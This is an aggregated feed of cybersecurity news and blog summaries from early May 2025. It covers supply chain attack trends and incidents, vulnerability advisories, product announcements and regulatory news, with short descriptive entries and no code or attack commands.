Distributed denial-of-service (DDoS) attacks are evolving. According to the NETSCOUT DDoS Threat Intelligence Report, there is a decline in volumetric reflection/amplification attacks, but a rise in direct path dynamic multivector attacks that evolve to evade existing defenses. Adversaries are leveraging artificial...

https://www.netscout.com/blog/ultimate-defense-against-multivector-ddos-attacks
How To Defend Against Threats With A Cyber Early Warning System
2025-05-05T12:53:16Z | 1746449596

Security teams are constantly on the lookout for hidden threat infrastructure that isn’t already widely known, and doesn’t appear on anyone’s radar. This usually involves analyzing a significant amount of alert data and hunting for emerging domains and IPs that are in the process of being setup, across linked malicious hosting clusters.  SOC and IR […] The post How To Defend Against Threats With A Cyber Early Warning System   appeared first on Silent Push.

https://www.silentpush.com/blog/cyber-early-warning-system/
Why You Can’t Afford to Ignore Software Supply Chain Attacks
2025-05-05T12:34:43Z | 1746448483

Ivanti’s 2025 State of Cybersecurity Report revealed that just 1 in 3 organizations feel prepared to protect themselves from software supply chain threats. With attackers increasingly targeting third-party dependencies, supply chain attacks may become a painful Achilles heel for cybersecurity if organizations continue to overlook them. The rising risk of software supply chain attacks Attack surfaces are ever-expanding rapidly and a key vector of that expansion is organizations’ software supply chains. Modern enterprises rely on numerous software applications, tools and dependencies within their own tech infrastructure. A single organization uses an average of 112 SaaS applications, according to a 2024 report by BetterCloud. And that web only grows more complex. On average, each software application has 150 dependencies — 90% of which are indirect dependencies — which account for the vast majority of vulnerabilities. The amount of threat actors targeting third-party dependencies has increased rapidly in the past few years with 75% of all software supply chains reporting attacks in 2024. Software supply chain threats have also grown more sophisticated as attackers look for any weakness in a supplier’s code to exploit. Yet, security teams often struggle to vet all of their software components properly. Ivanti’s cybersecurity research found that even though 84% of leaders at organizations say that it’s “very important” to monitor the software supply chain, nearly half (48%) have not yet identified the most vulnerable components in their own supply chain. This lack of due diligence leaves companies exposed to great financial and reputational risks. Common types of software supply chain attacks According to Gartner, 45% of organizations will have experienced a software supply chain attack by 2025. Here's a brief overview of some the most common types of software supply chain vulnerabilities targeted by attackers: Upstream server attacks are the most common supply chain attacks. These occur when hackers compromise a system positioned "upstream" from users, such as a code repository and injects a malicious payload / malware. This payload then spreads to "downstream" users via something like a software update. Midstream attacks refer to incidents where attackers compromise intermediary systems such as software development tools rather than the original codebase. Dependency confusion attacks attempt to fool a developer or system into downloading a compromised software dependency from an external source. Some common methods of attack include using a name for a malicious software upload that’s similar to a trusted internal library. The malicious version is often integrated into the software build instead of the legitimate dependency. Code-signing certificate attacks occur when hackers inject malicious software into digital code signing certificates meant to verify software security and authenticity. These attacks occur when threat actors compromise the development environment via social engineering or another tactic. CI/CD infrastructure attacks target automated development pipelines by introducing malware, such as cloning authentic GitHub repositories for malicious purposes. Recent examples of supply chain attacks You don’t have to dig too deep into the news to find real-life examples of these types of attacks coming to a head. Here are a few incidents of supply chain attacks from the past few years that got global attention. Okta social engineering attack  In October of 2023, Okta, an identity and access management services provider, experienced a serious data breach of its customer support system after four different Okta customers fell victim to social engineering attacks targeting their IT service desk. Attackers used these administrative credentials to launch multiple downstream attacks resulting in unauthorized access to the data of thousands of Okta customers including 1Password, BeyondTrust and Cloudflare. Kaseya ransomware attack In this July 2021 case, hackers exploited six zero-day vulnerabilities in Kaseya's remote management tool and used these vulnerabilities to distribute a malicious ransomware payload via a software update that infected hundreds of managed service providers (MSPs) and their clients. The attack halted operations at nearly 2,000 businesses worldwide and made headlines when the attackers demanded a staggering $70 million dollar ransom payment (which ultimately went unpaid). Codecov CI/CD attack In January of 2021, bad actors infiltrated the popular code testing tool Codecov, which at the time was used by over 29,000 customers. Attackers gained unauthorized access to Codecov’s Bash Uploader script and introduced malicious code which was then used by Codecov customers in their CI/CD pipelines. Codecov did not detect and report the attack until April of 2021 — meaning that these bad actors potentially had access to sensitive data in thousands of customer systems for months. Each of these supply chain breaches caused cascading, wide-reaching damage both to the exploited provider, their thousands of customers and beyond.   Serious impacts of supply chain attacks The scale of damage that results from software supply chain attacks cannot be understated. Each of the above attacks resulted in significant financial and reputational damage and prompted many organizations to reconsider their approach to vendor security. Financial impacts Cybersecurity Ventures predicts that the global annual cost of software supply chain attacks to businesses will reach a staggering $138 billion by 2031, up from $60 billion in 2025. These losses encompass everything from lost revenue, costs of remediation and legal fees and potential penalties for non-compliance. Following its 2023 data breach, Okta shares fell by 11%. Following another major data breach in 2022, Okta was then hit with a lawsuit by affected shareholders and required to pay out $60 million dollars. Operational impacts Supply chain attacks can lead thousands of customers to suffer disruptions and system shutdowns, halting critical operations and causing delays that further impact other vendors. Let’s look at just a few of the institutions impacted by the Kaseya breach. In Sweden, a large food retailer was forced to close 800 shops over the weekend, and the State Railway also suffered disruptions. Eleven schools and more than 100 nurseries in New Zealand also had to halt all online operations, resorting to pen and paper until the incident could be resolved. Reputational damage A publicly damaged reputation can set a company back in terms of trust with their customers and shareholders. Businesses may lose vendors and customer loyalty that took them years to establish. In March 2023, popular business communications software 3CX was compromised when hackers injected malicious code into their application, potentially exposing sensitive data of over 600,000 customers and garnering the company months of negative media attention and public backlash. The buck stops where? Technical debt and shared responsibility With software supply chain threats expected to rise in frequency and severity, it’s imperative for enterprises to establish clear accountability and adhere to strict security best practices for third-party vendors and software supply chain cybersecurity. Who owns software security?  Currently, many organizations lack strict and standardized processes for evaluating the security of third-party vendors. Moreover, many customers and vendors aren’t even on the same page about who holds responsibility for managing third-party software security. The State of Cybersecurity Trends Report analyzed organizations with various levels of cybersecurity capabilities to develop our Cybersecurity Maturity Scale. This scale ranged from less mature organizations (Level 1s and Level 2s) to organizations with more advanced cybersecurity capabilities. (Level 4s). Through this research we found that the less mature organizations most often believed that cybersecurity was solely the responsibility of the vendor. However, those with the highest levels of cybersecurity preparedness advocated for shared responsibility between both the software vendor and the customer. How to protect against software supply chain threats Software supply chain security is a vital part of comprehensive and proactive cybersecurity strategy. Fortifying your software supply chain and defending against potential attacks requires organizations to treat all third-party vendors and components as an extended part of their entire attack surface. Here are our key recommendations for organizations to ensure they’re prepared to better prevent supply chain attacks as well as detect and respond to any potential supply chain threats.  1. Rigorous vendor management and risk assessment Do your due diligence before aligning with software vendors. Seek out vendors that comply with industry standards and have a published vulnerability disclosure policy. Regular auditing, code reviews and proactive assessment from both the vendor and customer are key to mitigate risks. Our research finds that organizations with the most advanced levels of cybersecurity are most likely to do their due diligence when evaluating the cybersecurity of their third-party vendors including: Incorporating security assessment questionnaires (SAQs) in their evaluation.  Considering vendors' security certifications such as ISO 27001 and SOC 2.  Reviewing industry-specific compliance standards.  Ensuring vendors have incident response plans and processes to handle potential security breaches.  Requesting a Software Bill of Materials (SBOM) to understand the open-source and third-party components used in their software. 2. Continuous monitoring and proactive remediation across all dependencies Employing automated threat detection tools and processes to monitor and evaluate all of your software components is key. Dependencies, particularly in open source software components, are often overlooked and are a major vulnerability risk if not regularly monitored and updated. AI and automation tools can provide real-time insights into device, application and network performance to detect potential issues. Self-healing and automated remediation solutions offer effective ways to resolve problems with minimal or no human intervention. 3. Regular communication with third-party vendors A cornerstone of establishing mutual accountability for software supply chain security is frequent, open communication between customers and third-party vendors. Security and IT teams need to stay informed of any software updates, patches to fix known vulnerabilities and any emerging security threats. Learn more about software supply chain security Want to learn more? Read the full State of Cybersecurity Trends Report to gain in-depth insights into today’s most pressing cybersecurity threats and strategies for proactive risk management.

https://www.ivanti.com/blog/software-supply-chain-attack-risk
Operation Skipjack – Part 2: Shaping Activities- Operation White Heron
2025-05-05T12:05:16Z | 1746446716

Chapter One INDOPACOM Command Joint Staff Operations Camp H. M. Smith Aiea, Hawaii It’s the day after our most recent incident with the Weiqon Navy I am the INDOPACOM J3 Admiral Nikki Fury, and I’m standing at my secure multi-domain access console and take a beat to enjoy Kona’s finest coffee. The standing desk is... View Article The post Operation Skipjack – Part 2: Shaping Activities- Operation White Heron appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/operation-skipjack-part-2/
Automate Forensics to Eliminate Uncertainty
2025-05-05T12:00:01Z | 1746446401

Discover how Cisco XDR delivers automated forensics and AI-driven investigation—bringing speed, clarity, and confidence to SecOps teams.

https://blogs.cisco.com/security/automate-forensics-to-eliminate-uncertainty/
GISEC 2025: Enabling AI-Ready, Zero Trust, and Data-Sovereign Cybersecurity with Genians
2025-05-05T11:09:42Z | 1746443382

Genians returns to GISEC 2025 to showcase its AI-ready Zero Trust Access Platform, built on 20 years of innovation with 100,000+ Network Sensors and 8.3 million Agents deployed globally. Featuring Device Platform Intelligence, NAC, ZTNA, and EDR, Genians delivers flexible and regulation-ready cybersecurity tailored to the unique needs of the MEA region. With growing adoption across finance, healthcare, manufacturing, and government sectors, and dedicated local support from its new Dubai office, Genians and RASInfotech are accelerating secure digital transformation across the region.

https://www.genians.com/news/gisec-2025-enabling-ai-ready-zero-trust-and-data-sovereign-cybersecurity-with-genians/
Webinar: Elevate your security with Microsoft Defender XDR Integration
2025-05-05T07:44:53Z | 1746431093

21 May 2025, 10:00 - 11:00 CETWe’re excited to invite you to an exclusive webinar, where we introduce the new Microsoft Defender XDR integration with Logpoint — built for security teams who need faster, smarter, and more scalable threat detection.Discover how easily you can:Deploy quickly with template-driven integration — no heavy setup needed Achieve end-to-end visibility [...] The post Webinar: Elevate your security with Microsoft Defender XDR Integration appeared first on Logpoint.

https://www.logpoint.com/en/webinars/webinar-elevate-your-security/
Notice: Security Advisory (Update)
2025-05-04T18:55:58Z | 1746384958

This post is part of our ongoing commitment to protect customers and share threat intelligence with the cybersecurity community. The post Notice: Security Advisory (Update) appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/customer-security-update
Switching Firewall Vendors? Drop the Box
2025-05-04T12:26:50Z | 1746361610

The post Switching Firewall Vendors? Drop the Box  appeared first on Cato Networks.

https://www.catonetworks.com/resources/switching-firewall-vendors-drop-the-box-ebook/
U.S. indicts Black Kingdom Ransomware Operator for Microsoft Exchange Attacks
2025-05-03T07:40:15Z | 1746258015

The United States has indicted 36-year-old Rami Khaled Ahmed, a Yemeni national, for allegedly developing and operating the Black Kingdom ransomware, which targeted Microsoft Exchange servers in over 1,500 attacks worldwide. According to the U.S. Department of Justice (DoJ), between March 2021 and June 2023, Ahmed and unnamed co-conspirators infected systems belonging to numerous victims, including a medical billing firm in Encino, a ski resort in Oregon, a Pennsylvania school district, and a Wisconsin health clinic. Victims were instructed to pay $10,000 in Bitcoin and send proof of payment to a designated Black Kingdom email address. The malware exploited a […] The post U.S. indicts Black Kingdom Ransomware Operator for Microsoft Exchange Attacks first appeared on Cybersafe News.

https://cybersafe.news/u-s-indicts-black-kingdom-ransomware-operator-for-microsoft-exchange-attacks/
TikTok fined €530 M over unlawful data transfers to China
2025-05-03T06:31:28Z | 1746253888

The Irish Data Protection Commission (DPC) has imposed a hefty €530 million (approximately $601 million) fine on TikTok for unlawfully transferring the personal data of users in the European Economic Area (EEA) to China, breaching the European Union’s General Data Protection Regulation (GDPR). The total fine includes €485 million for violating Article 46(1) of the GDPR, which requires that personal data transferred outside the EU be afforded an equivalent level of protection. An additional €45 million was levied for breaching Article 13(1)(f), concerning transparency obligations. TikTok has been given six months to bring its data processing practices into full compliance. […] The post TikTok fined €530 M over unlawful data transfers to China first appeared on Cybersafe News.

https://cybersafe.news/tiktok-fined-e530-m-over-unlawful-data-transfers-to-china/
CVE-2024-5921 GlobalProtect App: Insufficient Certificate Validation Leads to Privilege Escalation (Severity: MEDIUM)
2025-05-02T18:40:00Z | 1746211200

CVE-2024-5921 GlobalProtect App: Insufficient Certificate Validation Leads to Privilege Escalation (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2024-5921
CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (Severity: MEDIUM)
2025-05-02T18:40:00Z | 1746211200

CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0120
RSAC 2025 wrap-up – Week in security with Tony Anscombe
2025-05-02T14:16:05Z | 1746195365

From the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions

https://www.welivesecurity.com/en/videos/rsac-2025-wrap-up-week-security-tony-anscombe/
The Role of ZTNA and Microsegmentation in Cybersecurity
2025-05-02T14:13:59Z | 1746195239

Zero Trust Network Access (ZTNA) and microsegmentation are two of the most popular tools shaping next-generation cybersecurity. However, organizations typically treat these as two separate initiatives to be implemented and managed by two separate security teams. For example: ZTNA is viewed as a replacement for a VPN and is owned by the access team. At the same time, microsegmentation is considered an alternative to managing network security with firewalls, virtual local area networks (VLANs), and access control lists (ACLs) and is typically owned by the network security team. When two separate teams exist, the two programs become siloed, and opportunities to amplify their benefits are left on the table.

https://www.zentera.net/blog/ztna-microsegmentation-in-cybersecurity
Palo Alto Networks to Announce Fiscal Third Quarter 2025 Financial Results on Tuesday, May 20, 2025
2025-05-02T12:30:00Z | 1746189000

SANTA CLARA, Calif. , May 2, 2025 /PRNewswire/ -- Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, announced today that it will release the financial results for its fiscal third quarter 2025, ended April 30, 2025 , after U.S. markets close on Tuesday, May 20, 2025 .

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-announce-fiscal-third-quarter-2025-financial
Cyber threat advisory: UK retail sector faces surge in ransomware attacks
2025-05-02T12:23:01Z | 1746188581

Background Since 22 April, major retail organisations around the United Kingdom have experienced disruption from multiple ransomware attacks targeting the sector. Several well-known brands have been impacted, with speculation growing that one cybercriminal group in particular – Scattered Spider – may be behind the activity as part of a coordinated campaign.  As the retained IR provider of choice to some of the UK’s largest high street brands, S-RM has been actively supporting several organisations in response to these events. In this snap analysis, our team shares insights on what motivations may underpin the campaign, as well as practical steps retail organisations should consider to protect themselves from this evolving threat.  Our team of experts is standing by to assist UK retailers concerned about their exposure to this latest threat. Please reach out to us via our website if you’d like to speak to one of our experts, who can share further tailored technical details on how to protect your organisation. If you’ve already identified potentially suspicious activity and would like some support in defining and triaging it, please contact our Incident Response team at cyberIR@s-rminform.com.

https://www.s-rminform.com/latest-thinking/cyber-threat-advisory-uk-retail-incidents
Cisco News Now: RSA Conference 2025
2025-05-02T12:00:00Z | 1746187200

Cisco continues to help security professionals and business secure and harness the power of AI, by announcing several new innovations in security and AI at RSACMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-news-now-rsa-conference-2025.html
Cisco News Now: RSA Conference 2025
2025-05-02T12:00:00Z | 1746187200

Cisco continues to help security professionals and business secure and harness the power of AI, by announcing several new innovations in security and AI at RSACMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-news-now-rsa-conference-2025.html
Bolster Your Regulatory Compliance with Layered Security Measures
2025-05-02T12:00:00Z | 1746187200

https://www.akamai.com/blog/security/2025/may/bolster-regulatory-compliance-with-layered-security-measures
The National Cyber Security Centre Finland’s weekly review – 18/2025
2025-05-02T11:20:28Z | 1746184828

This week, we talk about the implementation of the national Cybersecurity Act and how you can recognise new phishing messages currently in circulation.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-182025
The National Cyber Security Centre Finland’s weekly review – 18/2025
2025-05-02T11:20:28Z | 1746184828

This week, we talk about the implementation of the national Cybersecurity Act and how you can recognise new phishing messages currently in circulation.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-182025
Datasig: Fingerprinting AI/ML datasets to stop data-borne attacks
2025-05-02T11:00:00Z | 1746183600

Datasig generates compact, unique fingerprints for AI/ML datasets that let you compare training data with high accuracy—without needing access to the raw data itself. This critical capability helps AIBOM (AI bill of materials) tools detect data-borne vulnerabilities that traditional security tools completely miss.

https://blog.trailofbits.com/2025/05/02/datasig-fingerprinting-ai/ml-datasets-to-stop-data-borne-attacks/
Top Veracode Alternatives for Mobile App Security in 2025
2025-05-02T10:20:53Z | 1746181253

When it comes to mobile application security testing tools, Veracode has long been a popular choice for developers seeking strong solutions to protect their apps from vulnerabilities.

https://www.appknox.com/blog/best-veracode-alternatives
App deep links: connecting your website and app
2025-05-02T10:00:00Z | 1746180000

Since 2013, Search has recognized the importance of app deep links in a mobile-centric world. In this post, we'll review the current state of app deep links — take a look at what they are, the benefits of using them, and how to implement them effectively.

https://developers.google.com/search/blog/2025/05/app-deep-links
Objavljene Opće smjernice za provedbu obveze obavještavanja o značajnim incidentima
2025-05-02T08:03:32Z | 1746173012

Dana 2. svibnja 2025. godine objavljene su Opće smjernice za provedbu obveze obavještavanja o značajnim incidentima donesene u skladu s člankom 72. Uredbe o kibernetičkoj sigurnosti („Narodne novine“, br. 135/24.). Opće smjernice sadrže upute i pojašnjenja procesa obavještavanja o značajnim incidentima, pojašnjenja u vezi primjene kriterija za utvrđivanje značajnih incidenata, načine obavještavanja nadležnog CSIRT-a o... The post Objavljene Opće smjernice za provedbu obveze obavještavanja o značajnim incidentima first appeared on CERT.hr.

https://www.cert.hr/objavljene-opce-smjernice-za-provedbu-obveze-obavjestavanja-o-znacajnim-incidentima/
The National Cyber Security Centre Finland’s weekly review – 16/2025
2025-05-02T07:52:58Z | 1746172378

Last week’s elections proceeded without incidents from a cybersecurity perspective. This week, we take a closer look at the forthcoming changes introduced by the new Cybersecurity Act. You can also register for the webinar taking place in May, where the topic will be explored in more detail. The hottest topic of the week has been the uncertain future of the vulnerability database, as funding for the CVE project is coming to an end and internationally significant cybersecurity services are being shut down.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-162025
The National Cyber Security Centre Finland’s weekly review – 16/2025
2025-05-02T07:52:58Z | 1746172378

Last week’s elections proceeded without incidents from a cybersecurity perspective. This week, we take a closer look at the forthcoming changes introduced by the new Cybersecurity Act. You can also register for the webinar taking place in May, where the topic will be explored in more detail. The hottest topic of the week has been the uncertain future of the vulnerability database, as funding for the CVE project is coming to an end and internationally significant cybersecurity services are being shut down.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-162025
ZDI-CAN-27055: Rockwell Automation
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27107: Apple
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26743: 7-Zip
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.0 AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Ryota Shiga (GMO Flatt Security Inc.) with takumi-san.ai' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27121: Cisco
2025-05-02T05:00:00Z | 1746162000

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Bobby Gould (@bobbygould5) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26280: SolarWinds
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'ccc' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27105: Apple
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26771: Trend Micro
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Lays (@_L4ys) of TRAPA Security' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26753: 7-Zip
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.0 AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Ryota Shiga (GMO Flatt Security Inc.) with takumi-san.ai' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27106: Apple
2025-05-02T05:00:00Z | 1746162000

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26776: Microsoft
2025-05-02T05:00:00Z | 1746162000

A CVSS score 8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27098: Autodesk
2025-05-02T05:00:00Z | 1746162000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-02, 35 days ago. The vendor is given until 2025-08-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-283: MATE Desktop Atril Document Viewer CBT File Parsing Argument Injection Remote Code Execution Vulnerability
2025-05-02T05:00:00Z | 1746162000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of MATE Desktop Atril Document Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8.

http://www.zerodayinitiative.com/advisories/ZDI-25-283/
ZDI-25-284: MATE Desktop Atril Document Viewer EPUB File Parsing Directory Traversal Remote Code Execution Vulnerability
2025-05-02T05:00:00Z | 1746162000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of MATE Desktop Atril Document Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8.

http://www.zerodayinitiative.com/advisories/ZDI-25-284/
Security Alert (A25-05-01): Vulnerability in SonicWall SMA1000 Series Products
2025-05-02T04:00:00Z | 1746158400

SonicWall released a security advisory to address vulnerability in SonicWall SMA1000 Series products.

https://www.govcert.gov.hk/en/alerts_detail.php
xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs
2025-05-02T00:52:00Z | 1746147120

A employee at Elon Musk's artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk's companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

https://krebsonsecurity.com/2025/05/xai-dev-leaks-api-key-for-private-spacex-tesla-llms/
SonicBoom, From Stolen Tokens to Remote Shells - SonicWall SMA (CVE-2023-44221, CVE-2024-38475)
2025-05-01T22:31:04Z | 1746138664

Another day, another edge device being targeted - it’s a typical Thursday!In today’s blog post, we’re excited to share our previously private analysis of the now exploited in-the-wild N-day vulnerabilities affecting SonicWall’s SMA100 appliance. Over the last few months, our client

https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
AI Agents Are Here. So Are the Threats.
2025-05-01T22:00:08Z | 1746136808

Programs leveraging AI agents are increasingly popular. Nine attack scenarios using open-source agent frameworks show how bad actors target these applications. The post AI Agents Are Here. So Are the Threats. appeared first on Unit 42.

https://unit42.paloaltonetworks.com/agentic-ai-threats/
Zero Trust Pillars: Fast-Tracking Cyber Resilience
2025-05-01T20:25:00Z | 1746131100

Nine out of ten security leaders agree Zero Trust is key to strengthening their organization’s overall security posture. But agreeing on the importance of Zero Trust is only the beginning – implementation is where most teams get stuck. To help guide adoption, cybersecurity authorities like the National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) have released comprehensive Zero Trust models outlining critical pillars, maturity stages, and…

https://zeronetworks.com/blog/zero-trust-pillars-fast-tracking-cyber-resilience
The Rise of AI-Driven Cyberattacks: Accelerated Threats Demand Predictive and Real-Time Defenses
2025-05-01T17:24:54Z | 1746120294

Artificial intelligence (AI) is transforming industries, but it’s also empowering cybercriminals to launch sophisticated, high-speed cyberattacks. AI-driven attacks, particularly those orchestrated by autonomous AI agents, operate at an accelerated pace, compressing the window for detection and protection.

https://mixmode.ai/blog/the-rise-of-ai-driven-cyberattacks-accelerated-threats-demand-predictive-and-real-time-defenses/
Splunk and Cisco: a combined security mega force
2025-05-01T17:00:00Z | 1746118800

With key AI-related announcements at RSA, Cisco and Splunk reveal next-level cyber defenses. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/splunk-and-cisco-a-combined-security-mega-force.html
Splunk and Cisco: a combined security mega force
2025-05-01T17:00:00Z | 1746118800

With key AI-related announcements at RSA, Cisco and Splunk reveal next-level cyber defenses. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/splunk-and-cisco-a-combined-security-mega-force.html
CVE-2025-0117 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (Severity: MEDIUM)
2025-05-01T16:40:00Z | 1746117600

CVE-2025-0117 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0117
Zero-Day Vulnerabilities: Exploitation Trends and Lessons Learned
2025-05-01T15:16:40Z | 1746112600

Zero-day vulnerabilities are one of the most significant threats facing enterprises and critical infrastructure. These unknown software flaws, which attackers can exploit before patches become available, pose substantial risks to essential systems, operations, and sensitive data across industries. In 2024 alone, security researchers at Google tracked 75 zero-day vulnerabilities exploited in the wild. Particularly alarming […] The post Zero-Day Vulnerabilities: Exploitation Trends and Lessons Learned appeared first on RunSafe Security.

https://runsafesecurity.com/blog/zero-day-vulnerabilities-trends/
Webinar on demand: The ROI of SOC
2025-05-01T14:27:17Z | 1746109637

Join cybersecurity leaders from G'Secure Labs and Logpoint as they break down what truly defines SOC success. Discover how to shift your focus from alert management to business impact.In this session, you will get:Actionable insights into measuring SOC effectivenessProven strategies to reduce alert fatigue and optimize security outcomesReal-world examples of how organizations have transformed their [...] The post Webinar on demand: The ROI of SOC appeared first on Logpoint.

https://www.logpoint.com/en/webinars-on-demand/webinar-on-demand-the-roi-of-soc/
Sophos Firewall v21.5: Entra ID SSO for Sophos Connect
2025-05-01T13:48:14Z | 1746107294

How to make the most of the new features in Sophos Firewall v21.5.

https://news.sophos.com/en-us/2025/05/01/sophos-firewall-v21-5-entra-id-sso-for-sophos-connect/
Making PyPI's test suite 81% faster
2025-05-01T13:00:00Z | 1746104400

See how we slashed PyPI’s test suite runtime from 163 to 30 seconds. The techniques we share can help you dramatically improve your own project’s testing performance without sacrificing coverage.

https://blog.trailofbits.com/2025/05/01/making-pypis-test-suite-81-faster/
Recommended contract clauses for security operations centre procurement (ITSM.00.500)
2025-05-01T11:53:51Z | 1746100431

https://cyber.gc.ca/en/guidance/recommended-contract-clauses-security-operations-centre-procurement-itsm00500
From scandals to solar panels: Spain’s path to resilience
2025-05-01T07:44:58Z | 1746085498

Spain has recently witnessed political fragmentation and several high-profile corruption scandals. However, it has also emerged as a leader in renewable energy, economic recovery, and labour market reforms. Since 2023, Spain has achieved remarkable economic growth, outpacing much of the eurozone, driven by factors such as immigration, EU-backed investments, and a thriving tourism sector. At the same time, its ambitious renewable energy initiatives have positioned it at the forefront of Europe’s green transition, with significant progress in solar, wind, and green hydrogen projects. Yet Spain continues to grapple with structural challenges such as low productivity, housing shortages, and the need for greater transparency in governance. In this article, Mario Levin and Esperança Pereira explore the interplay between these dynamics, examining how Spain’s successes and struggles are shaping its future on both a national and European stage.

